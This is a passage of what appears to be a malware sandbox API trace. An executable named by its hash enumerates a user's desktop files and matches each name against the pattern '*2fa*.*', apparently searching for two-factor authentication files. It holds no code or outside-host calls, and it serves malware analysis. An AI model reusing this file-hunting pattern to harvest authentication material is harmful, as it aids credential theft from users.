lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\.") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\." [0110.832] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.832] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.832] lstrcatW (in: lpString1="\\", lpString2="." | out: lpString1="\\.") returned="\\." [0110.832] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0110.832] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xdbf44eb, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0xdbf44eb, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0110.832] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.832] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.832] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2=".." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\..") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\.." [0110.832] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.832] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.832] lstrcatW (in: lpString1="\\", lpString2=".." | out: lpString1="\\..") returned="\\.." [0110.832] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0110.832] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0110.832] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf546ee50, ftCreationTime.dwHighDateTime=0x1d7a7b3, ftLastAccessTime.dwLowDateTime=0x13efdd40, ftLastAccessTime.dwHighDateTime=0x1d7aa88, ftLastWriteTime.dwLowDateTime=0x13efdd40, ftLastWriteTime.dwHighDateTime=0x1d7aa88, nFileSizeHigh=0x0, nFileSizeLow=0x1883f, dwReserved0=0x0, dwReserved1=0x0, cFileName="0zAI6IIW3Y-.jpg", cAlternateFileName="0ZAI6I~1.JPG")) returned 1 [0110.832] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.832] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.832] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="0zAI6IIW3Y-.jpg" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\0zAI6IIW3Y-.jpg") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\0zAI6IIW3Y-.jpg" [0110.832] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.832] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\0zAI6IIW3Y-.jpg", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0110.832] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2f) returned 0x39700d0 [0110.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\0zAI6IIW3Y-.jpg", cchWideChar=47, lpMultiByteStr=0x39700d0, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\0zAI6IIW3Y-.jpg", lpUsedDefaultChar=0x0) returned 47 [0110.833] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.833] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.833] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.833] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aac60 [0110.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x29aac60, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.833] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aac60 | out: hHeap=0x29a0000) returned 1 [0110.833] PathMatchSpecW (pszFile="0zAI6IIW3Y-.jpg", pszSpec="*2fa*.*") returned 0 [0110.833] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.833] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf25bae10, ftCreationTime.dwHighDateTime=0x1d7a2f9, ftLastAccessTime.dwLowDateTime=0xa41e8ef0, ftLastAccessTime.dwHighDateTime=0x1d7a774, ftLastWriteTime.dwLowDateTime=0xa41e8ef0, ftLastWriteTime.dwHighDateTime=0x1d7a774, nFileSizeHigh=0x0, nFileSizeLow=0x2f95, dwReserved0=0x0, dwReserved1=0x0, cFileName="31NPwfpy_GlRh15.m4a", cAlternateFileName="31NPWF~1.M4A")) returned 1 [0110.833] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.833] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.833] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="31NPwfpy_GlRh15.m4a" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\31NPwfpy_GlRh15.m4a") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\31NPwfpy_GlRh15.m4a" [0110.833] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.833] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\31NPwfpy_GlRh15.m4a", cchWideChar=51, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 51 [0110.833] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x33) returned 0x38ea918 [0110.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\31NPwfpy_GlRh15.m4a", cchWideChar=51, lpMultiByteStr=0x38ea918, cbMultiByte=51, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\31NPwfpy_GlRh15.m4a", lpUsedDefaultChar=0x0) returned 51 [0110.833] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2e88 [0110.833] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea918 | out: hHeap=0x29a0000) returned 1 [0110.833] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.833] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aaab0 [0110.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x29aaab0, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.834] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaab0 | out: hHeap=0x29a0000) returned 1 [0110.834] PathMatchSpecW (pszFile="31NPwfpy_GlRh15.m4a", pszSpec="*2fa*.*") returned 0 [0110.834] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2e88 | out: hHeap=0x29a0000) returned 1 [0110.834] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b968de0, ftCreationTime.dwHighDateTime=0x1d7ad67, ftLastAccessTime.dwLowDateTime=0x691a0d20, ftLastAccessTime.dwHighDateTime=0x1d7aea9, ftLastWriteTime.dwLowDateTime=0x691a0d20, ftLastWriteTime.dwHighDateTime=0x1d7aea9, nFileSizeHigh=0x0, nFileSizeLow=0x139fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="38ZOxe4ZNObW5Sq.pdf", cAlternateFileName="38ZOXE~1.PDF")) returned 1 [0110.834] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.834] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.834] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="38ZOxe4ZNObW5Sq.pdf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\38ZOxe4ZNObW5Sq.pdf") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\38ZOxe4ZNObW5Sq.pdf" [0110.834] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.834] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\38ZOxe4ZNObW5Sq.pdf", cchWideChar=51, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 51 [0110.834] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x33) returned 0x38ea558 [0110.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\38ZOxe4ZNObW5Sq.pdf", cchWideChar=51, lpMultiByteStr=0x38ea558, cbMultiByte=51, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\38ZOxe4ZNObW5Sq.pdf", lpUsedDefaultChar=0x0) returned 51 [0110.834] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2858 [0110.834] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea558 | out: hHeap=0x29a0000) returned 1 [0110.834] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.834] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aac18 [0110.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x29aac18, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.834] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aac18 | out: hHeap=0x29a0000) returned 1 [0110.834] PathMatchSpecW (pszFile="38ZOxe4ZNObW5Sq.pdf", pszSpec="*2fa*.*") returned 0 [0110.834] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2858 | out: hHeap=0x29a0000) returned 1 [0110.834] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28cd69a0, ftCreationTime.dwHighDateTime=0x1d7a3ce, ftLastAccessTime.dwLowDateTime=0xe9831490, ftLastAccessTime.dwHighDateTime=0x1d7aee3, ftLastWriteTime.dwLowDateTime=0xe9831490, ftLastWriteTime.dwHighDateTime=0x1d7aee3, nFileSizeHigh=0x0, nFileSizeLow=0x895d, dwReserved0=0x0, dwReserved1=0x0, cFileName="7eG9d7.mp4", cAlternateFileName="")) returned 1 [0110.834] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.834] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.834] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="7eG9d7.mp4" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\7eG9d7.mp4") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\7eG9d7.mp4" [0110.834] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.834] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\7eG9d7.mp4", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0110.835] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2a) returned 0x39700d0 [0110.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\7eG9d7.mp4", cchWideChar=42, lpMultiByteStr=0x39700d0, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\7eG9d7.mp4", lpUsedDefaultChar=0x0) returned 42 [0110.835] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.835] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.835] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.835] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aabb8 [0110.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x29aabb8, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.835] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aabb8 | out: hHeap=0x29a0000) returned 1 [0110.835] PathMatchSpecW (pszFile="7eG9d7.mp4", pszSpec="*2fa*.*") returned 0 [0110.835] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.835] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0110.835] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.835] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.835] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\desktop.ini") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\desktop.ini" [0110.835] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.835] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\desktop.ini", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0110.835] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2b) returned 0x39700d0 [0110.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\desktop.ini", cchWideChar=43, lpMultiByteStr=0x39700d0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\desktop.ini", lpUsedDefaultChar=0x0) returned 43 [0110.835] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.835] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.835] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.835] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aabb8 [0110.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x29aabb8, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.835] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aabb8 | out: hHeap=0x29a0000) returned 1 [0110.835] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*2fa*.*") returned 0 [0110.836] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.836] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefda3e80, ftCreationTime.dwHighDateTime=0x1d7b3bc, ftLastAccessTime.dwLowDateTime=0xefda3e80, ftLastAccessTime.dwHighDateTime=0x1d7b3bc, ftLastWriteTime.dwLowDateTime=0x29567e00, ftLastWriteTime.dwHighDateTime=0x1d7b3ac, nFileSizeHigh=0x0, nFileSizeLow=0x192800, dwReserved0=0x0, dwReserved1=0x0, cFileName="f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", cAlternateFileName="F811CF~1.EXE")) returned 1 [0110.836] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.836] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.836] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" [0110.836] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.836] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", cchWideChar=100, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 100 [0110.836] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x64) returned 0x29a11c0 [0110.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", cchWideChar=100, lpMultiByteStr=0x29a11c0, cbMultiByte=100, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", lpUsedDefaultChar=0x0) returned 100 [0110.836] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a1230 [0110.836] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0110.836] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.836] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aac78 [0110.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x29aac78, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.836] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aac78 | out: hHeap=0x29a0000) returned 1 [0110.836] PathMatchSpecW (pszFile="f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", pszSpec="*2fa*.*") returned 0 [0110.836] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1230 | out: hHeap=0x29a0000) returned 1 [0110.836] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c000a40, ftCreationTime.dwHighDateTime=0x1d7a7d8, ftLastAccessTime.dwLowDateTime=0x841601c0, ftLastAccessTime.dwHighDateTime=0x1d7aabb, ftLastWriteTime.dwLowDateTime=0x841601c0, ftLastWriteTime.dwHighDateTime=0x1d7aabb, nFileSizeHigh=0x0, nFileSizeLow=0x1414, dwReserved0=0x0, dwReserved1=0x0, cFileName="fmnAnasf2I.mp4", cAlternateFileName="FMNANA~1.MP4")) returned 1 [0110.836] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.836] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.836] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="fmnAnasf2I.mp4" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\fmnAnasf2I.mp4") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\fmnAnasf2I.mp4" [0110.836] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.836] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\fmnAnasf2I.mp4", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0110.836] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2e) returned 0x39700d0 [0110.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\fmnAnasf2I.mp4", cchWideChar=46, lpMultiByteStr=0x39700d0, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\fmnAnasf2I.mp4", lpUsedDefaultChar=0x0) returned 46 [0110.837] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.837] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.837] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, 